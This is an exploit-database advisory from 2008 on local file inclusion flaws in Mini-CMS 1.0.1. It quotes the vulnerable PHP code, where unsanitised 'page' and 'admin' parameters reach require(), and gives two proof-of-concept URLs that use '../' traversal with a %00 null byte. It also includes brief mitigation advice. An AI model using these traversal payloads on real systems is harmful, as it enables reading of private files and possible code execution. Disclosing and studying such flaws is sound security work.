Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities

vendor:

Mini-CMS

by:

cOndemned

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Mini-CMS

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities

Mini-CMS 1.0.1 is vulnerable to multiple local file inclusion vulnerabilities due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to include arbitrary local files, which can lead to remote code execution. This vulnerability is due to the application including files based on user-supplied input without proper sanitization. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences and a URL-encoded NULL byte (%00) to the vulnerable application. This will allow the attacker to include arbitrary local files, which can lead to remote code execution.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to access local files. Additionally, access to the application should be restricted to trusted IP addresses.

Source

Exploit-DB raw data:

/*

	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_cms.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	81.		require("page/" . $page . ".php");
	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	83.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	

It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... 
Maybe double fail ? x]
	
	
EoF

# milw0rm.com [2008-12-07]